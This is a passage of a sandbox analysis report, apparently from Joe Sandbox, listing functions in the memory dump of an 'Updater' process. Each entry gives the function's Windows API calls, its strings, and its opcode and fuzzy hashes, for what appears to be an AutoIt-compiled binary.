                                                                                                                                                    • API String ID: 93392585-3793063076
                                                                                                                                                    • Opcode ID: 9b19f2be0cd8fedb720f899f317cfb808bf1ae229b2b480eedc66bf1f0b090a9
                                                                                                                                                    • Instruction ID: 8996ae8dacf9c393995093abf95609fde06b7c4fda560b9f44719e172ad68262
                                                                                                                                                    • Opcode Fuzzy Hash: 9b19f2be0cd8fedb720f899f317cfb808bf1ae229b2b480eedc66bf1f0b090a9
                                                                                                                                                    • Instruction Fuzzy Hash: DE518FB0600209DBDF20EF68D984BAEBFF4EF49314F244299E419D72A1E7709940CBB1
                                                                                                                                                    APIs
                                                                                                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 00B8D6B1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: IconLoad
                                                                                                                                                    • String ID: blank$info$question$stop$warning
                                                                                                                                                    • API String ID: 2457776203-404129466
                                                                                                                                                    • Opcode ID: adc68ae090ff49f7e31fffad38e86756cb5f6b52a51393c4dff3896c00f51a9c
                                                                                                                                                    • Instruction ID: 859015616297c23a7968224d043ec6d189619167bf0698b05638943f6db4195d
                                                                                                                                                    • Opcode Fuzzy Hash: adc68ae090ff49f7e31fffad38e86756cb5f6b52a51393c4dff3896c00f51a9c
                                                                                                                                                    • Instruction Fuzzy Hash: 3911C63264830A7FD7156A559C82D6A67D8EF16364B2000EBF908A61D1FFB16A40A3A8
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                    • String ID: 0.0.0.0
                                                                                                                                                    • API String ID: 642191829-3771769585
                                                                                                                                                    • Opcode ID: e1e15110be90c71524d184a11c2ee6e472f3d4edb236451c660bd4c0450da17f
                                                                                                                                                    • Instruction ID: 8ea69fac58188b9351ac06ab71be20c765422af5032c458678c5aae953b13ef3
                                                                                                                                                    • Opcode Fuzzy Hash: e1e15110be90c71524d184a11c2ee6e472f3d4edb236451c660bd4c0450da17f
                                                                                                                                                    • Instruction Fuzzy Hash: 8A11C031904114ABDB20BB659C4AAEA37ECEB55711F0005F9F518970A1FFB4CA859B60
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B34E5A: GetWindowLongW.USER32(00000000,000000EB), ref: 00B34E6B
                                                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 00BBA98F
                                                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 00BBA9AF
                                                                                                                                                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00BBABF3
                                                                                                                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00BBAC11
                                                                                                                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00BBAC32
                                                                                                                                                    • ShowWindow.USER32(00000003,00000000), ref: 00BBAC51
                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00BBAC76
                                                                                                                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 00BBAC99
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1211466189-0
                                                                                                                                                    • Opcode ID: 61d90ee0b124f3a26737522428d87599a098f6d552acad58ec264e8eb1266289
                                                                                                                                                    • Instruction ID: 3ffd01445b6bec1b23cbf9d1b3e262d248f3879e4b371a33a82ec33013146a11
                                                                                                                                                    • Opcode Fuzzy Hash: 61d90ee0b124f3a26737522428d87599a098f6d552acad58ec264e8eb1266289
                                                                                                                                                    • Instruction Fuzzy Hash: 6EB16A31A002199FDF14CF68C9857FE7BF2FB44701F1980A9EC599B295EAB4A940CB51
                                                                                                                                                    APIs
                                                                                                                                                    • ShowWindow.USER32(00000024,000000FF,00000000,?,?,00B78E87,00000004,00000000,00000000), ref: 00B354CC
                                                                                                                                                    • ShowWindow.USER32(00000024,00000006,00000000,?,?,00B78E87,00000004,00000000,00000000), ref: 00B78EE3
                                                                                                                                                    • ShowWindow.USER32(00000024,000000FF,00000000,?,?,00B78E87,00000004,00000000,00000000), ref: 00B78F66
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ShowWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1268545403-0
                                                                                                                                                    • Opcode ID: b273031df8df937fe85387c5da22aea77222b036b29ad386e901181a80be0ae0
                                                                                                                                                    • Instruction ID: 8a4db6dd3af672fb22aa3f0a377813f7e62df8f6380d465c99226925f1c810da
                                                                                                                                                    • Opcode Fuzzy Hash: b273031df8df937fe85387c5da22aea77222b036b29ad386e901181a80be0ae0
                                                                                                                                                    • Instruction Fuzzy Hash: C741B630604A809BCB3D9B2DD8CCB7A7BD2EB95312F348599E05B47A65DA75A9C0C720
                                                                                                                                                    APIs
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00BB3699
                                                                                                                                                    • GetDC.USER32(00000000), ref: 00BB36A1
                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BB36AC
                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00BB36B8
                                                                                                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00BB36F4
                                                                                                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00BB3705
                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00BB64C1,?,?,000000FF,00000000,?,000000FF,?), ref: 00BB3740
                                                                                                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00BB375F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3864802216-0
                                                                                                                                                    • Opcode ID: b1c8e9341ff88c0a9c2c7b0e895651bd7dceb200e5738521310ca43b976ebc96
                                                                                                                                                    • Instruction ID: 631b4bdaf25f302d3d473bcbac73ef62f1a0ad2ed2e8fff26ace7975a7f009e3
                                                                                                                                                    • Opcode Fuzzy Hash: b1c8e9341ff88c0a9c2c7b0e895651bd7dceb200e5738521310ca43b976ebc96
                                                                                                                                                    • Instruction Fuzzy Hash: 79318DB22012107FEB114F15CC89FEB3BADEF09B21F044155FE099B291EAB99C41CB64
                                                                                                                                                    APIs
                                                                                                                                                    • GetCPInfo.KERNEL32(?,?), ref: 00B614FE
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00B61581
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B61614
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00B6162B
                                                                                                                                                      • Part of subcall function 00B5282E: RtlAllocateHeap.NTDLL(00000000,?,00000001,?,00B40445,?,?,00B2FA72,00000000,?,?,?,00B21188,?), ref: 00B52860
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B616A7
                                                                                                                                                    • __freea.LIBCMT ref: 00B616D2
                                                                                                                                                    • __freea.LIBCMT ref: 00B616DE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2829977744-0
                                                                                                                                                    • Opcode ID: f55160d9a051223321eeb6604f87d39a75f589cdf38810ce29c754545350992c
                                                                                                                                                    • Instruction ID: 8fec6d9facba7a4e23f1e899c7c6d00cc97ee4c5edd04c15d6bff223d97db146
                                                                                                                                                    • Opcode Fuzzy Hash: f55160d9a051223321eeb6604f87d39a75f589cdf38810ce29c754545350992c
                                                                                                                                                    • Instruction Fuzzy Hash: 51919272E012169BDF208E6DC881AEEBBF5DF59350F1C4A99E905E7251DB39DC40CB60
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Variant$ClearInit
                                                                                                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                    • API String ID: 2610073882-625585964
                                                                                                                                                    • Opcode ID: 3ed87cf43e236fd6858897dae0ac546e38ab9de394f1e584f421bc456dbc599a
                                                                                                                                                    • Instruction ID: 77ce7b6b1fc764d2c4b8268a5a2867e76cad915f3b172936aecf92332ab939bb
                                                                                                                                                    • Opcode Fuzzy Hash: 3ed87cf43e236fd6858897dae0ac546e38ab9de394f1e584f421bc456dbc599a
                                                                                                                                                    • Instruction Fuzzy Hash: 97918471A04719ABDF34CF95D844FAE7BF8EF86710F108599F516AB240D7B09A44CBA0
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B810AB: CLSIDFromProgID.OLE32(?,?,?,?,?,?,?,-C000001E,00000001,?,00B80FDC,80070057), ref: 00B810C8
                                                                                                                                                      • Part of subcall function 00B810AB: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,?,?,?,?,-C000001E,00000001,?,00B80FDC,80070057), ref: 00B810E3
                                                                                                                                                      • Part of subcall function 00B810AB: lstrcmpiW.KERNEL32(?,00000000,?,?,?,?,?,?,?,-C000001E,00000001,?,00B80FDC,80070057), ref: 00B810F1
                                                                                                                                                      • Part of subcall function 00B810AB: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,?,?,?,?,-C000001E,00000001,?,00B80FDC,80070057), ref: 00B81101
                                                                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00BA5851
                                                                                                                                                    • _wcslen.LIBCMT ref: 00BA5959
                                                                                                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00BA59D1
                                                                                                                                                    • CoTaskMemFree.OLE32(?), ref: 00BA59DC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                                    • String ID: NULL Pointer assignment
                                                                                                                                                    • API String ID: 614568839-2785691316
                                                                                                                                                    • Opcode ID: 318e7b73842aa471e5d79f0c2a8eef940fb0a1e918d1f8a90cfdbf791e6c1b7c
                                                                                                                                                    • Instruction ID: bf5c99f967504beb70e53c3b66cd3b1a247bb1ac0e48da303c55b9bd7329e7a3
                                                                                                                                                    • Opcode Fuzzy Hash: 318e7b73842aa471e5d79f0c2a8eef940fb0a1e918d1f8a90cfdbf791e6c1b7c
                                                                                                                                                    • Instruction Fuzzy Hash: 9B91F871D05219DBDF20DFA4D881AEEB7F8FF08310F1045AAE919A7251EB745A45CF60
                                                                                                                                                    APIs
                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00BA44FE
                                                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00BA460B
                                                                                                                                                    • _wcslen.LIBCMT ref: 00BA4616
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00BA4790
                                                                                                                                                      • Part of subcall function 00B91ABE: VariantInit.OLEAUT32(00000000), ref: 00B91AFE
                                                                                                                                                      • Part of subcall function 00B91ABE: VariantCopy.OLEAUT32(?,?), ref: 00B91B07
                                                                                                                                                      • Part of subcall function 00B91ABE: VariantClear.OLEAUT32(?), ref: 00B91B13
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                    • API String ID: 4137639002-1221869570
                                                                                                                                                    • Opcode ID: 32a4e7ee8cbf2dc47c763d1ef0a6d817f6032333ef18ed5ef6f3cdcaf17b37e0
                                                                                                                                                    • Instruction ID: 237fe2cfbaae4aee97bc733c430c70ba026aebe787d836774b0d7f123d5cd1f6
                                                                                                                                                    • Opcode Fuzzy Hash: 32a4e7ee8cbf2dc47c763d1ef0a6d817f6032333ef18ed5ef6f3cdcaf17b37e0
                                                                                                                                                    • Instruction Fuzzy Hash: 0A81BF71A08311AFCB10DF24C480A6ABBE4FF8A714F0489ACF94A9B351DB71ED05CB91
                                                                                                                                                    APIs
                                                                                                                                                    • IsWindow.USER32(01366850), ref: 00BB88F4
                                                                                                                                                    • IsWindowEnabled.USER32(01366850), ref: 00BB8900
                                                                                                                                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00BB89E4
                                                                                                                                                    • SendMessageW.USER32(01366850,000000B0,?,?), ref: 00BB8A1B
                                                                                                                                                    • IsDlgButtonChecked.USER32(?,?), ref: 00BB8A58
                                                                                                                                                    • GetWindowLongW.USER32(01366850,000000EC), ref: 00BB8A7A
                                                                                                                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00BB8A92
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4072528602-0
                                                                                                                                                    • Opcode ID: 054906eec636b8254ff15b953b94a53aac69a964140904b2f6ff6fa54a563926
                                                                                                                                                    • Instruction ID: a870c7b259cf32a39347f5c877dba8d2c6d30bb63333670e1d538946bd1d9c91
                                                                                                                                                    • Opcode Fuzzy Hash: 054906eec636b8254ff15b953b94a53aac69a964140904b2f6ff6fa54a563926
                                                                                                                                                    • Instruction Fuzzy Hash: 34718C38600205AFDF259F64C885FFABBE9FF09300F1441D9E99A972A1DBB1A840DB51
                                                                                                                                                    APIs
                                                                                                                                                    • GetMenu.USER32(?), ref: 00BB2AA5
                                                                                                                                                    • GetMenuItemCount.USER32(00000000), ref: 00BB2AD7
                                                                                                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00BB2AFF
                                                                                                                                                    • _wcslen.LIBCMT ref: 00BB2B35
                                                                                                                                                    • GetMenuItemID.USER32(?,?), ref: 00BB2B6F
                                                                                                                                                    • GetSubMenu.USER32(?,?), ref: 00BB2B7D
                                                                                                                                                      • Part of subcall function 00B83E94: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00B83EB2
                                                                                                                                                      • Part of subcall function 00B83E94: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B83EC3
                                                                                                                                                      • Part of subcall function 00B83E94: GetCurrentThreadId.KERNEL32 ref: 00B83ECA
                                                                                                                                                      • Part of subcall function 00B83E94: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,?,?,?,00B8368B), ref: 00B83ED1
                                                                                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00BB2C05
                                                                                                                                                      • Part of subcall function 00B8F7F5: Sleep.KERNEL32 ref: 00B8F86D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$Thread$ItemMessage$AttachCountCurrentInputPostProcessSendSleepStringTimeoutWindow_wcslen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3648899353-0
                                                                                                                                                    • Opcode ID: 8565491adfca5a36cc6e6077e3f08f0e0f73f0961b7016f1875355254af63cd0
                                                                                                                                                    • Instruction ID: 53bcaa0fd81605bd3a73806eaf01316a739df2f66eaa956cefe50fba99faba02
                                                                                                                                                    • Opcode Fuzzy Hash: 8565491adfca5a36cc6e6077e3f08f0e0f73f0961b7016f1875355254af63cd0
                                                                                                                                                    • Instruction Fuzzy Hash: B9719035A00215AFCB14EF64C885AFEBBF5EF48710F148499E91AEB351DB74AE41CB90
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B8EC33: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B8DCD6,?), ref: 00B8EC50
                                                                                                                                                      • Part of subcall function 00B8EC33: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B8DCD6,?), ref: 00B8EC69
                                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00B8F29C
                                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00B8F2B7
                                                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00B8F2E6
                                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00B8F31B
                                                                                                                                                    • _wcslen.LIBCMT ref: 00B8F454
                                                                                                                                                    • _wcslen.LIBCMT ref: 00B8F46C
                                                                                                                                                    • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00B8F4B9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$AttributesFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4252263244-0
                                                                                                                                                    • Opcode ID: 28e6887f3f738b8827857aada72ecb9d9d663a4700b8ea402dcb7aa010b6ba14
                                                                                                                                                    • Instruction ID: 825767c7973a8c8d12a15b9a89de933a3a3907c8cc21d06ecd43d63d30bbae12
                                                                                                                                                    • Opcode Fuzzy Hash: 28e6887f3f738b8827857aada72ecb9d9d663a4700b8ea402dcb7aa010b6ba14
                                                                                                                                                    • Instruction Fuzzy Hash: CA5172B14083859BC724EBA4D8819EB73ECDF85310F44096FB189D31A1EF74A648C766
                                                                                                                                                    APIs
                                                                                                                                                    • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00B559D1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00B5529E
                                                                                                                                                    • __fassign.LIBCMT ref: 00B55319
                                                                                                                                                    • __fassign.LIBCMT ref: 00B55334
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00B5535A
                                                                                                                                                    • WriteFile.KERNEL32(?,FF8BC35D,00000000,00B559D1,00000000,?,?,?,?,?,?,?,?,?,00B559D1,?), ref: 00B55379
                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,00B559D1,00000000,?,?,?,?,?,?,?,?,?,00B559D1,?), ref: 00B553B2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
